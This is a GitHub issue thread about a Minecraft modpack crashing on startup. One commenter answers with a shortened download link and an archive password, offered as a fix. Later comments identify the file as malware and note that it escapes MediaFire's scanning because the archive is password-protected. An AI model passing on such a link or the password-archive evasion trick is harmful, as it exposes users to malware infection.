### ISSUE TITLE
Crash on startup 

### ISSUE THREAD

**Issue by Margatroidu** [Invadermonky/JustEnoughMagiculture#14]
In my modpack for some unknown reason the game crashes at startup
Can you please help me find out what this is due to?
Or even fix it.

[crash-2024-09-29_05.36.48-client.txt](https://github.com/user-attachments/files/17177360/crash-2024-09-29_05.36.48-client.txt)

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo
Archive codepass: changeme

you may need to install the c compiler

**Comment by Margatroidu** [comment]
I got it. It's because of the Beast Slayer mod.

**Comment by Margatroidu** [comment]
@SagarChandra07 
I'm sorry, but I'm wary of downloading this.

**Comment by Margatroidu** [comment]
> @SagarChandra07 I'm sorry, but I'm wary of downloading this.

I have a suspicion that this man is a scammer. Don't download anything from him

**Comment by thelabcat** [comment]
> > @SagarChandra07 I'm sorry, but I'm wary of downloading this.
> 
> 
> 
> I have a suspicion that this man is a scammer. Don't download anything from him

You are right. It is spamming links to that file everywhere. I checked it and it is definitely malware, but evades MediaFire's auto-check via the old password protected archive trick. Don't run it.
